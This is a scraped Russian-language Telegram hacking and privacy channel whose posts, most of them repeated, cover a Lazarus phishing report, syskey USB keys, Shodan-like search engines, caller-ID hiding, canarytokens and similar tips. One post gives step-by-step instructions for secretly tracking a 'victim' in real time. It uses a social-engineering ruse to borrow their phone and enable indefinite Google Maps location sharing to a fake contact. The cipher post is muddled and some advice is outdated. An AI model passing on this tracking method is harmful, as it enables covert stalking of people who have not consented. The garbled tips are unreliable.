This media is not supported in your browser
VIEW IN TELEGRAM
Масштабная кража данных запланирована на 21 июня
Хакерская группировка Lazarus готовит фишинговую атаку на шесть стран и более 5 миллионов предприятий.
Целью запланированной Lazarus операции является финансовая выгода. С помощью фишинговых писем злоумышленники намерены заманить жертв на мошеннические сайты и выманить у них учетные и финансовые данные.
Вредоносные письма будут рассылаться от имени правительственных учреждений, госорганов и торговых организаций, которым поручено контролировать распределение финансовой помощи в рамках пандемии COVID-19.
За дело уже взялись иностранные спец. службы. Если предприятия не успеют осведомить всех своих сотрудников, то дело приобретет серьезный оборот.
Будем следить за развитием событий.
Хакерская группировка Lazarus готовит фишинговую атаку на шесть стран и более 5 миллионов предприятий.
Целью запланированной Lazarus операции является финансовая выгода. С помощью фишинговых писем злоумышленники намерены заманить жертв на мошеннические сайты и выманить у них учетные и финансовые данные.
Вредоносные письма будут рассылаться от имени правительственных учреждений, госорганов и торговых организаций, которым поручено контролировать распределение финансовой помощи в рамках пандемии COVID-19.
За дело уже взялись иностранные спец. службы. Если предприятия не успеют осведомить всех своих сотрудников, то дело приобретет серьезный оборот.
Будем следить за развитием событий.
Контроль над прошлым: смогут ли хакеры взломать нашу память?
Приветствую друзья.
Давно мы не постили лонгриды. Ну что ж, сегодня субботний вечер, поэтому предлагаю вам прочитать статью о связях нейротехнологий и хакеров.
Кстати, заметил, что сейчас многие стартапы связаны с нейротемой. Тот же Илон Маск открыл в 2016 году нейротехнологическую компанию.
Так что, весьма интересно хотя бы просто предположить, как в недалеком будущем под это будут подстраиваться хакеры.
|Читать статью|
Приветствую друзья.
Давно мы не постили лонгриды. Ну что ж, сегодня субботний вечер, поэтому предлагаю вам прочитать статью о связях нейротехнологий и хакеров.
Кстати, заметил, что сейчас многие стартапы связаны с нейротемой. Тот же Илон Маск открыл в 2016 году нейротехнологическую компанию.
Так что, весьма интересно хотя бы просто предположить, как в недалеком будущем под это будут подстраиваться хакеры.
|Читать статью|
Telegraph
Контроль над прошлым: смогут ли хакеры взломать нашу память?
Представьте, что вы можете пролистать все ваши воспоминания, как ленту "Инстаграма", вновь проживая самые яркие моменты жизни и сохраняя в памяти самые дорогие мгновения. А теперь давайте представим антиутопичную версию этого будущего, где хакеры получают…
This media is not supported in your browser
VIEW IN TELEGRAM
Делаем из флешки ключ для доступа к компьютеру
Приветствую читателей Cmd!
Сегодня речь пойдет о дополнительной защите вашей системы. Помимо обычной авторизации в профиль, мы без сторонних программ, можем поставить двухфакторную аутентификацию.
А именно сделать из флешки ключ для доступа к компьютеру. Приступим
Вставляем любую флешку в пк > Нажимаем Win+R и пишем
Теперь нажимаем Win+R и вводим
Все. Теперь на флешке появился файл "StartKey.Key". Теперь для входа в систему необходимо будет сначала вставить наш флеш ключ, а только потом авторизоваться
в профиле Windows
Приветствую читателей Cmd!
Сегодня речь пойдет о дополнительной защите вашей системы. Помимо обычной авторизации в профиль, мы без сторонних программ, можем поставить двухфакторную аутентификацию.
А именно сделать из флешки ключ для доступа к компьютеру. Приступим
Вставляем любую флешку в пк > Нажимаем Win+R и пишем
diskmgmt.msc > У вас откроется окно управления дисками. Найдем свою флешку и кликаем правой кнопкой мыши > выбираем пункт "Изменить букву диска или пусть к диску" > Меняем буку на AТеперь нажимаем Win+R и вводим
syskey > У вас откроется окно Защита БД > нажимаем обновить > откроется окно "Ключ запуска" > выбираем пункт "Хранить ключ запуска на дискете" Все. Теперь на флешке появился файл "StartKey.Key". Теперь для входа в систему необходимо будет сначала вставить наш флеш ключ, а только потом авторизоваться
в профиле Windows
This media is not supported in your browser
VIEW IN TELEGRAM
Какие данные Вконтакте сливает правоохранительным органам
Приветствую читателей Cmd!
Сейчас социальная сеть "Вконтакте" переживает не лучшие времена.
Активность и доверие пользователей угасает с каждым годом из-за активной работы с органами.
Вот список данных, которые социальная сеть передает без решения суда. То есть по любому запросу органов, Вконтакте моментально скидывает эти данные о пользователе.
-когда и с каких IP-адресов осуществлялся вход в аккаунт
-историю изменения пароля (без указания самих паролей)
-привязки телефонных номеров (с указанием, куда привязан прежний номер)
-смены имени и фамилии
-даты, длительность и причины блокировок, а также даты и причины обращения в поддержку с текстом, указанным в теме обращения, но без истории переписки
-данные о том, что к его аккаунту имели доступ другие лица
Что касаемо переписок, то как утверждает Вконтакте, без решения суда они их не передают. На чтение личной переписки должны быть веские основания.
Вот такие вот дела.
Приветствую читателей Cmd!
Сейчас социальная сеть "Вконтакте" переживает не лучшие времена.
Активность и доверие пользователей угасает с каждым годом из-за активной работы с органами.
Вот список данных, которые социальная сеть передает без решения суда. То есть по любому запросу органов, Вконтакте моментально скидывает эти данные о пользователе.
-когда и с каких IP-адресов осуществлялся вход в аккаунт
-историю изменения пароля (без указания самих паролей)
-привязки телефонных номеров (с указанием, куда привязан прежний номер)
-смены имени и фамилии
-даты, длительность и причины блокировок, а также даты и причины обращения в поддержку с текстом, указанным в теме обращения, но без истории переписки
-данные о том, что к его аккаунту имели доступ другие лица
Что касаемо переписок, то как утверждает Вконтакте, без решения суда они их не передают. На чтение личной переписки должны быть веские основания.
Вот такие вот дела.
👍1
Создаем собственный метод шифрования
Давайте вспомним несколько методов шифрования и используем их для того что бы оставить сообщение другу.
И так за основу возьмем старое доброе "Привет, мир".
▫️Первым способом мы обратимся к нашему алфавиту, а точнее к расположению букв в нем:
A-1; Б-2; В-3; Г-4; Д-5; Е-6; Ё-7; Ж-8; З-9; И-10; Й-11; К-12; Л-13; М-14; Н-15; О-16; П-17; Р-18; С-19; Т-20; У-21; Ф-22; Х-23; Ц-24; Ч-25; Ш-26; Щ-27; Ъ-28; Ы-29; Ь-30; Э-31; Ю-32; Я-33.
Таким образом подставив цифры мы получи 17 18 10 3 6 20, 14 10 18.
▫️Теперь давайте используем шифр Цезаря, для этого зададим ключ например 4 и к каждому значению прибавим 4.
Получили: 21 22 14 7 10 24 18 14 22.
▫️В нашем шифре есть повторяющиеся номера, просто добавим их значения, количество и позиции, а сами числа уберем.
Получили: 22 2 2 9 21 14 7 10 24 18 14. Подобный метод используются при сжатии mp3 файлов для уменьшения размера но в нашем случае сообщение маленькое и размер только увеличился но это не важно.
▫️Теперь давайте между нашими номерами поставим например цифру 1 и получим 2212121912111417110124118114.
Вот такой вот интересный и легкий в запоминании шифр, если знаешь алгоритм. Можно шифровать так абсолютно любые сообщения.
Давайте вспомним несколько методов шифрования и используем их для того что бы оставить сообщение другу.
И так за основу возьмем старое доброе "Привет, мир".
▫️Первым способом мы обратимся к нашему алфавиту, а точнее к расположению букв в нем:
A-1; Б-2; В-3; Г-4; Д-5; Е-6; Ё-7; Ж-8; З-9; И-10; Й-11; К-12; Л-13; М-14; Н-15; О-16; П-17; Р-18; С-19; Т-20; У-21; Ф-22; Х-23; Ц-24; Ч-25; Ш-26; Щ-27; Ъ-28; Ы-29; Ь-30; Э-31; Ю-32; Я-33.
Таким образом подставив цифры мы получи 17 18 10 3 6 20, 14 10 18.
▫️Теперь давайте используем шифр Цезаря, для этого зададим ключ например 4 и к каждому значению прибавим 4.
Получили: 21 22 14 7 10 24 18 14 22.
▫️В нашем шифре есть повторяющиеся номера, просто добавим их значения, количество и позиции, а сами числа уберем.
Получили: 22 2 2 9 21 14 7 10 24 18 14. Подобный метод используются при сжатии mp3 файлов для уменьшения размера но в нашем случае сообщение маленькое и размер только увеличился но это не важно.
▫️Теперь давайте между нашими номерами поставим например цифру 1 и получим 2212121912111417110124118114.
Вот такой вот интересный и легкий в запоминании шифр, если знаешь алгоритм. Можно шифровать так абсолютно любые сообщения.
This media is not supported in your browser
VIEW IN TELEGRAM
4 поисковые систем в помощь хакерам
CNN в свое время назвала Shodan «самым страшным поисковиком интернета». И даже его название действительно звучит пугающе. Несмотря на то, что это было три года назад, Shodan не особо развился с тех пор. Для тех, кто незнаком с Shodan: он ищет подключенные к интернету устройства по всему миру. Это понятие включает в себя не только компьютеры и смартфоны, он также может найти ветровые турбины, светофоры, устройства считывания номерных знаков, холодильники и практически все остальные устройства с подключением к Сети.
Shodan не единственный поисковик такого типа. Поэтому я собрал для вас пачку поисковых систем для поиска уязвимостей.
1. Shodan
▫️https://www.shodan.io/
2. IVRE
▫️https://ivre.rocks/
3. ZoomEye
▫️https://www.zoomeye.org/topics
4. Censys
▫️https://censys.io/
Пару лет назад их было чуть больше, но все они потихоньку по разным причинам закрываются. Если знаете еще какие-нибудь поисковики, то обязательно кидайте в @predlojkaCmd_bot
CNN в свое время назвала Shodan «самым страшным поисковиком интернета». И даже его название действительно звучит пугающе. Несмотря на то, что это было три года назад, Shodan не особо развился с тех пор. Для тех, кто незнаком с Shodan: он ищет подключенные к интернету устройства по всему миру. Это понятие включает в себя не только компьютеры и смартфоны, он также может найти ветровые турбины, светофоры, устройства считывания номерных знаков, холодильники и практически все остальные устройства с подключением к Сети.
Shodan не единственный поисковик такого типа. Поэтому я собрал для вас пачку поисковых систем для поиска уязвимостей.
1. Shodan
▫️https://www.shodan.io/
2. IVRE
▫️https://ivre.rocks/
3. ZoomEye
▫️https://www.zoomeye.org/topics
4. Censys
▫️https://censys.io/
Пару лет назад их было чуть больше, но все они потихоньку по разным причинам закрываются. Если знаете еще какие-нибудь поисковики, то обязательно кидайте в @predlojkaCmd_bot
This media is not supported in your browser
VIEW IN TELEGRAM
Как узнать, кто ворует наш интернет
Приветствую читателей Cmd!
Заметил, что сейчас идет какой-то тренд по взлому роутеров.
С одной стороны понятно, ведь самоизоляция была и все дела. Да и провернуть сейчас это очень легко.
Взять допустим инструмент WiFiTe и хороший словарь да и все. Поэтому нужно частенько проверять свой сеть, даже если вы уверены в ее защите.
Посмотреть устройства подключенные к вашей сети можно как в настройках роутера, так и используя специальные программы.
Я предлагаю воспользоваться программой Wireless Network Watcher. Она лучше своих аналогов и удобнее чем обычные настройки роутера.
Она показывает IP адрес, MAC адрес, имя подключенного устройства, сетевой адаптер, активность и время подключения.
Если обнаружили чужое устройство, то смените пароль и заблойкируйте доступ по IP и MAC адресу
Установить
▫️https://goo.su/1jNT
Приветствую читателей Cmd!
Заметил, что сейчас идет какой-то тренд по взлому роутеров.
С одной стороны понятно, ведь самоизоляция была и все дела. Да и провернуть сейчас это очень легко.
Взять допустим инструмент WiFiTe и хороший словарь да и все. Поэтому нужно частенько проверять свой сеть, даже если вы уверены в ее защите.
Посмотреть устройства подключенные к вашей сети можно как в настройках роутера, так и используя специальные программы.
Я предлагаю воспользоваться программой Wireless Network Watcher. Она лучше своих аналогов и удобнее чем обычные настройки роутера.
Она показывает IP адрес, MAC адрес, имя подключенного устройства, сетевой адаптер, активность и время подключения.
Если обнаружили чужое устройство, то смените пароль и заблойкируйте доступ по IP и MAC адресу
Установить
▫️https://goo.su/1jNT
This media is not supported in your browser
VIEW IN TELEGRAM
Устанавливаем слежку с помощью Google Maps
Приветствую друзья.
Сегодня поговорим о том, как с помощью сервиса Google Maps следить за передвижением человека.
Данную функцию предоставляет сам сервис, поэтому настроить слежку будет легко.
Что для этого нужно?
-Посредством СИ получить доступ к телефону человека. Например, попросить позвонить и отойти.
-60 секунд на установку
Осуществляем установку слежки
Заходим в Google Maps с телефона на котором устанавливаем слежку > Переходим во вкладку "Передача геоданных > Выбираем пункт "Пока я не отключу"
и выбираем свой телефон в контактах "жертвы".
Важный момент. Когда выбираете себя в контактах "жертвы" посмотрите указана ли вместе с номером телефона ваша почта от google аккаунта.
Если нет, то добавьте. После зайдите со своего устройства в Google Maps и вас появятся координаты "жертвы" в реальном времени.
Для полной анонимности можете осуществить установку, добавив в контакты свой левый номер и почту.
Приветствую друзья.
Сегодня поговорим о том, как с помощью сервиса Google Maps следить за передвижением человека.
Данную функцию предоставляет сам сервис, поэтому настроить слежку будет легко.
Что для этого нужно?
-Посредством СИ получить доступ к телефону человека. Например, попросить позвонить и отойти.
-60 секунд на установку
Осуществляем установку слежки
Заходим в Google Maps с телефона на котором устанавливаем слежку > Переходим во вкладку "Передача геоданных > Выбираем пункт "Пока я не отключу"
и выбираем свой телефон в контактах "жертвы".
Важный момент. Когда выбираете себя в контактах "жертвы" посмотрите указана ли вместе с номером телефона ваша почта от google аккаунта.
Если нет, то добавьте. После зайдите со своего устройства в Google Maps и вас появятся координаты "жертвы" в реальном времени.
Для полной анонимности можете осуществить установку, добавив в контакты свой левый номер и почту.
❤1
This media is not supported in your browser
VIEW IN TELEGRAM
Google знает о тебе все
Гугл собирает много разной информации о вашем профиле и вашей жизни в интернете. Они этого не скрывают и даже предоставляют полный (наверное)
отчет о вашей деятельности в интернете. Я собрал абсолютно все прямые линки для просмотра собранной информации.
▫️Узнайте свою историю местоположений
https://maps.google.com/locationhistory/b/0
▫️Узнайте историю поисковых запросов
https://history.google.com/history/
▫️Узнайте, что Google о вас думает
https://www.google.com/settings/u/0/ads/authenticated
▫️Узнайте обо всех услугах и сервисах, которые вы используете
https://www.google.com/settings/dashboard
▫️Узнайте список всех приложений и расширений, которые имеют доступ к вашему аккаунту
https://security.google.com/settings/security/permissions
К слову, если вы синхронизировали свой гугл аккаунт с галереей своего телефона, то ваши фотографии автоматически загружались на их облако.
Если вы любитель почистить историю браузера, то тут гугл тоже вас обошел, ведь он ведет свой учет.
Гугл собирает много разной информации о вашем профиле и вашей жизни в интернете. Они этого не скрывают и даже предоставляют полный (наверное)
отчет о вашей деятельности в интернете. Я собрал абсолютно все прямые линки для просмотра собранной информации.
▫️Узнайте свою историю местоположений
https://maps.google.com/locationhistory/b/0
▫️Узнайте историю поисковых запросов
https://history.google.com/history/
▫️Узнайте, что Google о вас думает
https://www.google.com/settings/u/0/ads/authenticated
▫️Узнайте обо всех услугах и сервисах, которые вы используете
https://www.google.com/settings/dashboard
▫️Узнайте список всех приложений и расширений, которые имеют доступ к вашему аккаунту
https://security.google.com/settings/security/permissions
К слову, если вы синхронизировали свой гугл аккаунт с галереей своего телефона, то ваши фотографии автоматически загружались на их облако.
Если вы любитель почистить историю браузера, то тут гугл тоже вас обошел, ведь он ведет свой учет.
Самая могущественная хакерская группировка в мире вернулась
Думаю многие слышали о хакерской группировки Evil Corp. Они производили масштабные атаки на американские банки и в общей сумме наворовали около 100 миллионов долларов.
За любую информацию, которая приведет к поимке преступников американские власти готовы заплатить 5 миллионов долларов.
Группировка возобновила свою деятельность после того, как власти США и Великобритании обнародовали обвинения против нескольких ее участников в декабре 2019 года. Преступники организовали несколько вредоносных кампаний в январе 2020 года с использованием привычных для них вредоносов и вновь затаились в марте. Вскоре группировка возобновила свою преступную деятельность, вооружившись новым вредоносным инструментом WastedLocker, который заменил устаревший вариант вымогателя BitPaymer.
Самое интересное в этой ситуации, что ребята из Evil Corp проживают в России, а члены группировки являются родственниками российских чиновников.
Хакеры ездят на люксовых машинах, роскошно живут и не особо скрывают свои личности.
Думаю, объяснять почему одна из самых известных киберпреступных группировок в истории до сих пор на свободе не нужно🙈
Думаю многие слышали о хакерской группировки Evil Corp. Они производили масштабные атаки на американские банки и в общей сумме наворовали около 100 миллионов долларов.
За любую информацию, которая приведет к поимке преступников американские власти готовы заплатить 5 миллионов долларов.
Группировка возобновила свою деятельность после того, как власти США и Великобритании обнародовали обвинения против нескольких ее участников в декабре 2019 года. Преступники организовали несколько вредоносных кампаний в январе 2020 года с использованием привычных для них вредоносов и вновь затаились в марте. Вскоре группировка возобновила свою преступную деятельность, вооружившись новым вредоносным инструментом WastedLocker, который заменил устаревший вариант вымогателя BitPaymer.
Самое интересное в этой ситуации, что ребята из Evil Corp проживают в России, а члены группировки являются родственниками российских чиновников.
Хакеры ездят на люксовых машинах, роскошно живут и не особо скрывают свои личности.
Думаю, объяснять почему одна из самых известных киберпреступных группировок в истории до сих пор на свободе не нужно🙈
Защищаем информацию на флешке
В 21 веке без информации человек попросту не может существовать.
Мы передаем ее в сети, загружаем на различные сервисы и очень часто прибегаем к портативным носителям информации-USB -флеш -накопителям.
Но как же защитить информацию на них? Ведь такой маленький, но важный гаджет легко потерять, а информация на нем может попасть не в те руки.
1.Вам потребуется флешка на файловой системе NTFS
Это самая популярная система,так что скорее всего у вас есть такая флешка
2.На разделе диска нажимаем правой клавиши мышки. Выбираем ''свойства'' и переходим на вкладку ''безопасность''. В ней кликаем на ''изменить''
3.В открывшемся окне ставьте галочки во вкладке ''запретить''
4.Применяем изменения.Нажимаем ''ок''
Теперь при попытки зайти на флешку у пользователя будет отказано в доступе.
Чтобы получить доступ к флешки опять заходим во вкладку ''безопасность''. Нажимаем ''Дополнительно''
Во вкладке ''Тип'' меня с ''запрещено'' на ''разрешено''
Данный способ выручит вас, если флешка попала вам в руки совсем недавно и у вас нет времени устанавливать сторонние программы.
Например BitLocker (установлен только в Windows 10 pro) или VeraCrypt
В 21 веке без информации человек попросту не может существовать.
Мы передаем ее в сети, загружаем на различные сервисы и очень часто прибегаем к портативным носителям информации-USB -флеш -накопителям.
Но как же защитить информацию на них? Ведь такой маленький, но важный гаджет легко потерять, а информация на нем может попасть не в те руки.
1.Вам потребуется флешка на файловой системе NTFS
Это самая популярная система,так что скорее всего у вас есть такая флешка
2.На разделе диска нажимаем правой клавиши мышки. Выбираем ''свойства'' и переходим на вкладку ''безопасность''. В ней кликаем на ''изменить''
3.В открывшемся окне ставьте галочки во вкладке ''запретить''
4.Применяем изменения.Нажимаем ''ок''
Теперь при попытки зайти на флешку у пользователя будет отказано в доступе.
Чтобы получить доступ к флешки опять заходим во вкладку ''безопасность''. Нажимаем ''Дополнительно''
Во вкладке ''Тип'' меня с ''запрещено'' на ''разрешено''
Данный способ выручит вас, если флешка попала вам в руки совсем недавно и у вас нет времени устанавливать сторонние программы.
Например BitLocker (установлен только в Windows 10 pro) или VeraCrypt
This media is not supported in your browser
VIEW IN TELEGRAM
Как скрыть свой номер при звонке на Android
Приветствую читателей Cmd!
Бывает, что нужно скрыть свой номер телефона при звонке, и многие задаются вопросом: "Как же это сделать?"
Тут все довольно просто и установка дополнительных программ не требуется.
Заходим в "Телефон", нажимаем на 3 точки (Меню), Далее выбираем "Дополнительные
услуги" (У вас может называться по другому, допустим "Расширенные
настройки"), и видим пункт "Отображение номера абонента" (Может называться по другому), нажимаем на него, и жмем на "Скрыть номер".
Если у вас заблокирована эта функция, то нужно ее активировать, для этого переходим СЮДА, смотрим код для вашего оператора, и активируем "Антиопределитель", после этого повторите действия выше еще раз.
В итоге Абонент , которому вы звоните, не увидит ваш номер.
Приветствую читателей Cmd!
Бывает, что нужно скрыть свой номер телефона при звонке, и многие задаются вопросом: "Как же это сделать?"
Тут все довольно просто и установка дополнительных программ не требуется.
Заходим в "Телефон", нажимаем на 3 точки (Меню), Далее выбираем "Дополнительные
услуги" (У вас может называться по другому, допустим "Расширенные
настройки"), и видим пункт "Отображение номера абонента" (Может называться по другому), нажимаем на него, и жмем на "Скрыть номер".
Если у вас заблокирована эта функция, то нужно ее активировать, для этого переходим СЮДА, смотрим код для вашего оператора, и активируем "Антиопределитель", после этого повторите действия выше еще раз.
В итоге Абонент , которому вы звоните, не увидит ваш номер.
Вот почему нужно серьезнее относится к выбору VPN
Когда устройство подключается к Интернету, оно получает один или несколько адресов в сети. Зачастую ваше устройство получает как IPv4-адрес, так и IPv6-адрес. IPv6 является более новым сетевым стандартом, предназначенным для подключения к гораздо большей сети подключенных устройств, чем старый, более широко используемый протокол IPv4.
Протокол IPv4 имеет запись в виде четырёх десятичных чисел значением от 0 до 255, разделённых точками, например, 192.168.0.3.
В 6-й версии IP-адрес (IPv6) является 128-битовым. Внутри адреса разделителем является двоеточие (напр. 2001:0db8:85a3:0000:0000:8a2e:0370:7334).
А теперь внимание:
Многие реализации VPN не ПОДДЕРЖИВАЮТ или, что еще хуже, ПОЛНОСТЬЮ ИГНОРИРУЮТ протокол IPv6. То есть, VPN сервер не может выполнить свою работу скрыть ваш реальный ip адрес и зашифровать данные. Поэтому вы, того не ведая, работаете прямо с таким сайтом. Следовательно, владелец такого сайта видит ваш реальный IP плюс ваш провайдер знает, что вы ходили на этот сайт.
Проверять IP адрес cайта можно с помощью этого онлайн-сервиса. http://t.co/pahhvVh4zd в поле domain or IP address введите URL проверяемого сайта. Если он имеет адрес с двоеточиями, то он имеет протокол IPv6. Следовательно, если ваш VPN его не поддерживает, владелец сайта узнает ваш IP, а провайдер увидит, что вы делаете на этом сайте.
Когда устройство подключается к Интернету, оно получает один или несколько адресов в сети. Зачастую ваше устройство получает как IPv4-адрес, так и IPv6-адрес. IPv6 является более новым сетевым стандартом, предназначенным для подключения к гораздо большей сети подключенных устройств, чем старый, более широко используемый протокол IPv4.
Протокол IPv4 имеет запись в виде четырёх десятичных чисел значением от 0 до 255, разделённых точками, например, 192.168.0.3.
В 6-й версии IP-адрес (IPv6) является 128-битовым. Внутри адреса разделителем является двоеточие (напр. 2001:0db8:85a3:0000:0000:8a2e:0370:7334).
А теперь внимание:
Многие реализации VPN не ПОДДЕРЖИВАЮТ или, что еще хуже, ПОЛНОСТЬЮ ИГНОРИРУЮТ протокол IPv6. То есть, VPN сервер не может выполнить свою работу скрыть ваш реальный ip адрес и зашифровать данные. Поэтому вы, того не ведая, работаете прямо с таким сайтом. Следовательно, владелец такого сайта видит ваш реальный IP плюс ваш провайдер знает, что вы ходили на этот сайт.
Проверять IP адрес cайта можно с помощью этого онлайн-сервиса. http://t.co/pahhvVh4zd в поле domain or IP address введите URL проверяемого сайта. Если он имеет адрес с двоеточиями, то он имеет протокол IPv6. Следовательно, если ваш VPN его не поддерживает, владелец сайта узнает ваш IP, а провайдер увидит, что вы делаете на этом сайте.
Что знают Мобильные операторы?
Мобильные операторы получают массу данных, по которым можно узнать очень многое о жизни отдельно взятого абонента. А поняв, как обрабатываются и как хранятся эти данные, вы сможете отследить всю цепочку прохождения информации от звонка до списания денег.
Недавно стало известно, что сотовый оператор России – "МТС" рассылает банкам на e-mail, любопытное рекламное предложение. Из него следует, что за совсем символическую сумму в масштабах подобного бизнеса можно приобрести целый массив данных.
Компании с помощью активной сим-карты уже научились отслеживать не только наше местоположение, но и популярные маршруты, любимые магазины и кафе. Они знают всё о наших тратах и всех транзакциях, покупках и о увлечениях с помощью анализа нашего траффика через мобильный браузер. С большой вероятностью и эти данные легко продаются, но уже в своих нишах, а не только банковской сфере.
К сожалению, мы уже давно перешагнули границу, когда наши персональные данные были действительно “персональными”. Сейчас ей владеют абсолютно другие лица, и именно они зарабатывают на этом.
Мобильные операторы получают массу данных, по которым можно узнать очень многое о жизни отдельно взятого абонента. А поняв, как обрабатываются и как хранятся эти данные, вы сможете отследить всю цепочку прохождения информации от звонка до списания денег.
Недавно стало известно, что сотовый оператор России – "МТС" рассылает банкам на e-mail, любопытное рекламное предложение. Из него следует, что за совсем символическую сумму в масштабах подобного бизнеса можно приобрести целый массив данных.
Компании с помощью активной сим-карты уже научились отслеживать не только наше местоположение, но и популярные маршруты, любимые магазины и кафе. Они знают всё о наших тратах и всех транзакциях, покупках и о увлечениях с помощью анализа нашего траффика через мобильный браузер. С большой вероятностью и эти данные легко продаются, но уже в своих нишах, а не только банковской сфере.
К сожалению, мы уже давно перешагнули границу, когда наши персональные данные были действительно “персональными”. Сейчас ей владеют абсолютно другие лица, и именно они зарабатывают на этом.
Участники движения Anonymous назвали TikTok шпионским ПО властей Китая
Активисты движения Anonymous обвинили популярный китайский сервис TikTok в массовой слежке за пользователями и передаче данных властям Китая.
«Скажем так, каждый подписанный на нас пользователь Twitter может поставить лайк какому-то твиту. Потом через 5 лет вы посетите Китай и вас арестуют. Еще вероятнее, что ваши финансовые буду похищены, скомпрометированы, и вами будут манипулировать», — сообщили участники Anonymous.
Пользователь Reddit проанализировал принцип работы приложения и выяснил, что TikTok собирает сведения не только о контактах пользователях, но также другие данные об устройстве, а именно:
-тип процессора и серийный номер
-информацию об установленных программах, точках доступа Wi-Fi, IP-адресе и пр.
-данные о месторасположении пользователя каждые 30 секунд,
-данные из буфера обмена (каждые несколько секунд)
Даже не знаю, с одной стороны TikTok молодое приложение и рекламу туда действительно сложно интегрировать, поэтому производить сбор данных пользователей это нормальная практика, но вот зачем собирать настолько конфиденциальную информацию, не понятно 😡
Активисты движения Anonymous обвинили популярный китайский сервис TikTok в массовой слежке за пользователями и передаче данных властям Китая.
«Скажем так, каждый подписанный на нас пользователь Twitter может поставить лайк какому-то твиту. Потом через 5 лет вы посетите Китай и вас арестуют. Еще вероятнее, что ваши финансовые буду похищены, скомпрометированы, и вами будут манипулировать», — сообщили участники Anonymous.
Пользователь Reddit проанализировал принцип работы приложения и выяснил, что TikTok собирает сведения не только о контактах пользователях, но также другие данные об устройстве, а именно:
-тип процессора и серийный номер
-информацию об установленных программах, точках доступа Wi-Fi, IP-адресе и пр.
-данные о месторасположении пользователя каждые 30 секунд,
-данные из буфера обмена (каждые несколько секунд)
Даже не знаю, с одной стороны TikTok молодое приложение и рекламу туда действительно сложно интегрировать, поэтому производить сбор данных пользователей это нормальная практика, но вот зачем собирать настолько конфиденциальную информацию, не понятно 😡
This media is not supported in your browser
VIEW IN TELEGRAM
Создаем ловушку для хакера
Привет, читатель Cmd
Сегодня мы рассмотрим, как расставить "ловушки" на вашем пк. С помощью сервиса canarytokens мы создадим файл, при открытии которого к нам на почту моментально придет полная информация о том, кто его открыл.
Хочу внести ясность.
Если кто-то сумел проникнуть в нашу систему, то он наверняка позаботился о своей анонимности и безопасности. Но так как мы будем в курсе незваного гостя, то сможем предотвратить утечку данных.
И еще один момент. Сервис canarytokens проверенный. В файл просто вшит токен. Токен - это средство идентификации. Поэтому переживать, что сервис стянет ваши данные не стоит.
Переходим на сайт > выбираем в каком файле будет вшит токен (например, microsoft word) > указываем почту на которую придет оповещение о проникновении при открытии файла > пишем любое описание. Скачиваем наш файл и называем его очень заманчиво и креативно. Также можно заполнить его по ключевым словам (password, key, cvv и тд).
https://canarytokens.org/generate
Привет, читатель Cmd
Сегодня мы рассмотрим, как расставить "ловушки" на вашем пк. С помощью сервиса canarytokens мы создадим файл, при открытии которого к нам на почту моментально придет полная информация о том, кто его открыл.
Хочу внести ясность.
Если кто-то сумел проникнуть в нашу систему, то он наверняка позаботился о своей анонимности и безопасности. Но так как мы будем в курсе незваного гостя, то сможем предотвратить утечку данных.
И еще один момент. Сервис canarytokens проверенный. В файл просто вшит токен. Токен - это средство идентификации. Поэтому переживать, что сервис стянет ваши данные не стоит.
Переходим на сайт > выбираем в каком файле будет вшит токен (например, microsoft word) > указываем почту на которую придет оповещение о проникновении при открытии файла > пишем любое описание. Скачиваем наш файл и называем его очень заманчиво и креативно. Также можно заполнить его по ключевым словам (password, key, cvv и тд).
https://canarytokens.org/generate
Google заканчивает эру Root прав на android!
Одним из главных преимуществ ОС Android является ее открытость – пользователи могут сами выбирать лаунчеры и приложения по умолчанию, а также получать права суперпользователя и устанавливать свои версии прошивки. Но ребятки из google решили уйти в сторону безопасности и покончить с рутированием своей мобильной ОС.
Для установки кастомизированной прошивки нужно разблокировать загрузчик ОС, что поддерживается (но не рекомендуется) некоторыми производителями электроники, в частности Sony. Однако последняя версия SafetyNet от Google будет воспринимать подобные действия как взлом.
SafetyNet - это механизм, используемый приложениями в Google Play Store для обнаружения вредоносных программ. SafetyNet жизненно необходим банковскому, финансовому ПО и другим приложениям. Раньше SafertyNet можно было "убедить" и получить рут права без проблем будто смартфон не был взломан. Однако с новой версией SafetyNet они лишились такой возможности.
Иными словами, вам придется выбирать между комфортом и рутированием телефона. Получить рут права как бы можно, но из-за этого все важные приложения будут вам недоступны и пользоваться телефоном в повседневной жизни будет невозможно. Такие вот дела😪
Одним из главных преимуществ ОС Android является ее открытость – пользователи могут сами выбирать лаунчеры и приложения по умолчанию, а также получать права суперпользователя и устанавливать свои версии прошивки. Но ребятки из google решили уйти в сторону безопасности и покончить с рутированием своей мобильной ОС.
Для установки кастомизированной прошивки нужно разблокировать загрузчик ОС, что поддерживается (но не рекомендуется) некоторыми производителями электроники, в частности Sony. Однако последняя версия SafetyNet от Google будет воспринимать подобные действия как взлом.
SafetyNet - это механизм, используемый приложениями в Google Play Store для обнаружения вредоносных программ. SafetyNet жизненно необходим банковскому, финансовому ПО и другим приложениям. Раньше SafertyNet можно было "убедить" и получить рут права без проблем будто смартфон не был взломан. Однако с новой версией SafetyNet они лишились такой возможности.
Иными словами, вам придется выбирать между комфортом и рутированием телефона. Получить рут права как бы можно, но из-за этого все важные приложения будут вам недоступны и пользоваться телефоном в повседневной жизни будет невозможно. Такие вот дела😪
ezgif.com-gif-maker (15).gif
9.5 KB
Создаем собственный QR-код
Мы уже делали пост о создании QR-кода, в котором рассказали о довольно популярном в свое время методе мошенничества.
Сделали мы это с целью показать, что Quick Response Code может применяться абсолютно везде, зависит только от вашей фантазии.
Но вот только ресурс, который мы обозревали в прошлом посте не блистал функционалом. Поэтому держите новенький и хороший сайт с самым большим набором инструментов и фишек для создания qr-кода.
QR Code Generation позволяет зашифровать URL-адрес, текст, визитку, Эл.почту, sms-сообщение, WI-FI, Bitcoin кошелек, Facebook, PDF, MP3, фотографии
и много чего еще. Также можно выбрать и настроить дизайн вашего QR-кода.
Кроме того, многие другие возможности применения не требуют соединения смартфона с Интернетом. Можно шифровать записи календаря о предстоящих мероприятиях, WiFi-соединения или контактные данные в виде виртуальных визиток (vCard), и затем пользователь может сохранять их в свой мобильный телефон.
https://ru.qr-code-generator.com/
Мы уже делали пост о создании QR-кода, в котором рассказали о довольно популярном в свое время методе мошенничества.
Сделали мы это с целью показать, что Quick Response Code может применяться абсолютно везде, зависит только от вашей фантазии.
Но вот только ресурс, который мы обозревали в прошлом посте не блистал функционалом. Поэтому держите новенький и хороший сайт с самым большим набором инструментов и фишек для создания qr-кода.
QR Code Generation позволяет зашифровать URL-адрес, текст, визитку, Эл.почту, sms-сообщение, WI-FI, Bitcoin кошелек, Facebook, PDF, MP3, фотографии
